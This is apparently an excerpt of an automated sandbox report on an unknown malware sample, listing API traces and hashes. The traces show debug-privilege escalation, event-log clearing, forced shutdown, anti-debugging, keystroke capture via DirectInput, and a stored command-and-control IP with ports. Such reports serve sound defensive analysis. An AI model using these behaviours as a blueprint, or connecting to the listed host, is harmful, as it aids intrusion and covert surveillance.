                                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,037A0D80,74DEE010,74DF2FA0,74DF0F00,?,03776028,?,?), ref: 0377E519
                                                                                                                                                                      • lstrcatW.KERNEL32(037A0D80,\DisplaySessionContainers.log,?,03776028,?,?), ref: 0377E529
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,037A0D80,?,03776028,?,?), ref: 0377E538
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03776028,?,?), ref: 0377E546
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03776028,?,?), ref: 0377E563
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,03776028,?,?), ref: 0377E56E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,03776028,?,?), ref: 0377E577
                                                                                                                                                                      • DeleteFileW.KERNEL32(037A0D80,?,03776028,?,?), ref: 0377E58A
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000,?,03776028,?,?), ref: 0377E597
                                                                                                                                                                      • DirectInput8Create.DINPUT8(?,00000800,03794934,037A1220,00000000,?,03776028,?,?), ref: 0377E5B2
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377E665
                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0377E672
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                                                                                      • String ID: <$\DisplaySessionContainers.log
                                                                                                                                                                      • API String ID: 1095970075-1170057892
                                                                                                                                                                      • Opcode ID: 5ce9b3654d909e51b552e2f7bd71ad82c8793d322eaf8e52790d3112acca264e
                                                                                                                                                                      • Instruction ID: 3f927e952daef7dd5de9b4cf7cc536a48caf00b02467c7fd54ae37b52e724882
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ce9b3654d909e51b552e2f7bd71ad82c8793d322eaf8e52790d3112acca264e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9441C375740309BFEB10EFA8EC45F9E3BA4AB88700F508689F615DB2C5D675E402CB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0377DFA4), ref: 03777637
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0377DFA4), ref: 0377763E
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0377765A
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777677
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777681
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0377DFA4), ref: 03777691
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777698
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 037776BA
                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 037776C7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                                                                                      • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                                                                                      • API String ID: 1802016953-1577477132
                                                                                                                                                                      • Opcode ID: 4b4bb1237e60a10bca0351e7d25e5ced5cdbd4902059446ba4c4cc91eff7e106
                                                                                                                                                                      • Instruction ID: 359546ba681c32bcd4b26e712feeb7a3bd952dcd645f0023c230d99c9ac163fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b4bb1237e60a10bca0351e7d25e5ced5cdbd4902059446ba4c4cc91eff7e106
                                                                                                                                                                      • Instruction Fuzzy Hash: 37216371A4030CBFEB10FBE4DC0AFBE7778EB08710F01460AF605AA185DAB45545CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03780576
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 0378058E
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0378059E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 037805AE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03780600
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03780615
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                                                                                      • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                                                                                      • API String ID: 3290314748-423161677
                                                                                                                                                                      • Opcode ID: 51867ca4102c3d9f119be2e074e1acebeb604a48ca6bdb4a1f8113825cbdf448
                                                                                                                                                                      • Instruction ID: 33dcca44b2fad796877d3cdb32248f9b7fb130341e85e820d3ce04d93ea1402d
                                                                                                                                                                      • Opcode Fuzzy Hash: 51867ca4102c3d9f119be2e074e1acebeb604a48ca6bdb4a1f8113825cbdf448
                                                                                                                                                                      • Instruction Fuzzy Hash: 9731C372E8121DBBDB10FFA4DC84AEEB7B8EF44755F144516E511E7040DB74AA08CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 3435690185-3733053543
                                                                                                                                                                      • Opcode ID: 0b3c67100f572e17496aac71cc753b22a56e6a4fe387c3c2e3844ba6022065a7
                                                                                                                                                                      • Instruction ID: 869fc932c71bf55be07a073d24a188f96173105bd556e08dd6abe68d0276c049
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b3c67100f572e17496aac71cc753b22a56e6a4fe387c3c2e3844ba6022065a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 27117B71B4021CABDB14FFB4DC49FAE7778EB08700F41865AF9059B185DA759905CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenEventLogW.ADVAPI32(00000000,037958BC), ref: 0377B3E7
                                                                                                                                                                      • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0377B3F2
                                                                                                                                                                      • CloseEventLog.ADVAPI32(00000000), ref: 0377B3F9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$ClearCloseOpen
                                                                                                                                                                      • String ID: Application$Security$System
                                                                                                                                                                      • API String ID: 1391105993-2169399579
                                                                                                                                                                      • Opcode ID: 4b12d649ba2b6c6ab3904564bba8ec59c2186fa5daf85e05a392715f97b43ebe
                                                                                                                                                                      • Instruction ID: 3179c9bdd96509358329e5cc585b51c42fc4a1683edf369eabcf5e7027a2e131
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b12d649ba2b6c6ab3904564bba8ec59c2186fa5daf85e05a392715f97b43ebe
                                                                                                                                                                      • Instruction Fuzzy Hash: 74E0E53260622C5BE612EB09B848B1EF3E0FBCD315F05475BE94856104C63084469B95
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf$_memset
                                                                                                                                                                      • String ID: :$@
                                                                                                                                                                      • API String ID: 1292703666-1367939426
                                                                                                                                                                      • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                                                                      • Instruction ID: 191227b890a4e21afe0a0be3101a489193a5a09cd9d6cd54614a6fa69d25d319
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                                                                      • Instruction Fuzzy Hash: FC3152B6D4021CABDB14DFE5DC85FEEB7B9FB88300F50421DEA0AA7241E6745905CB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037778FC), ref: 03777756
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037778FC,?,?,?,?,?,?,74DF0630), ref: 0377775D
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03777785
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 037777B9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                      • API String ID: 2349140579-2896544425
                                                                                                                                                                      • Opcode ID: 6477baa8e0fcb087a007d2a8ee19d49934a37f530f875f4bae4aa175567bd3b6
                                                                                                                                                                      • Instruction ID: 43331c9968169ec201a4a77b3f0a45aa4064ec3f7a57c500db358aec11f6d17b
                                                                                                                                                                      • Opcode Fuzzy Hash: 6477baa8e0fcb087a007d2a8ee19d49934a37f530f875f4bae4aa175567bd3b6
                                                                                                                                                                      • Instruction Fuzzy Hash: F4116571A4020CABDF04EFE5DD4ABFEB7B4EB08704F108659E505AB280DA759505CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0378131C
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03781331
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(037925B8), ref: 0378133C
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 03781358
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 0378135F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 02C6793D
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C67952
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(02C75350), ref: 02C6795D
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 02C67979
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02C67980
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03777B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                        • Part of subcall function 03777B70: OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                        • Part of subcall function 03777B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
                                                                                                                                                                        • Part of subcall function 03777B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                        • Part of subcall function 03777B70: GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • ExitWindowsEx.USER32(00000005,00000000), ref: 0377B471
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03777B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                        • Part of subcall function 03777B70: OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                        • Part of subcall function 03777B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
                                                                                                                                                                        • Part of subcall function 03777B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                        • Part of subcall function 03777B70: GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 0377B44D
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03777B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                        • Part of subcall function 03777B70: OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                        • Part of subcall function 03777B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
                                                                                                                                                                        • Part of subcall function 03777B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                        • Part of subcall function 03777B70: GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • ExitWindowsEx.USER32(00000004,00000000), ref: 0377B429
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0377B586
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0377B596
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0377B5B3
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B5D4
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377B61B
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B63C
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377B72C
                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0377B737
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F756
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F770
                                                                                                                                                                        • Part of subcall function 0377F707: __CxxThrowException@8.LIBCMT ref: 0377F781
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                                                                                      • String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 0378401C
                                                                                                                                                                      • __mtterm.LIBCMT ref: 03784028
                                                                                                                                                                        • Part of subcall function 03783CF1: DecodePointer.KERNEL32(00000009,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783D02
                                                                                                                                                                        • Part of subcall function 03783CF1: TlsFree.KERNEL32(00000027,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783D1C
                                                                                                                                                                        • Part of subcall function 03783CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03788D48
                                                                                                                                                                        • Part of subcall function 03783CF1: _free.LIBCMT ref: 03788D4B
                                                                                                                                                                        • Part of subcall function 03783CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03788D72
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0378403E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0378404B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03784058
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03784065
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840B5
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840D0
                                                                                                                                                                      • __init_pointers.LIBCMT ref: 037840DA
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840EB
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840F8
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784105
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784112
                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00013E75,?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784133
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 03784148
                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784162
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03784174
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69ACE
                                                                                                                                                                      • __mtterm.LIBCMT ref: 02C69ADA
                                                                                                                                                                        • Part of subcall function 02C697A5: DecodePointer.KERNEL32(00000008,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C697B6
                                                                                                                                                                        • Part of subcall function 02C697A5: TlsFree.KERNEL32(00000025,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C697D0
                                                                                                                                                                        • Part of subcall function 02C697A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C6C031
                                                                                                                                                                        • Part of subcall function 02C697A5: _free.LIBCMT ref: 02C6C034
                                                                                                                                                                        • Part of subcall function 02C697A5: DeleteCriticalSection.KERNEL32(00000025,?,?,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C6C05B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C69AF0
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C69AFD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C69B0A
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C69B17
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69B67
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69B82
                                                                                                                                                                      • __init_pointers.LIBCMT ref: 02C69B8C
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69B9D
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BAA
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BB7
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BC4
                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00009929,?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BE5
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 02C69BFA
                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69C14
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C69C26
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
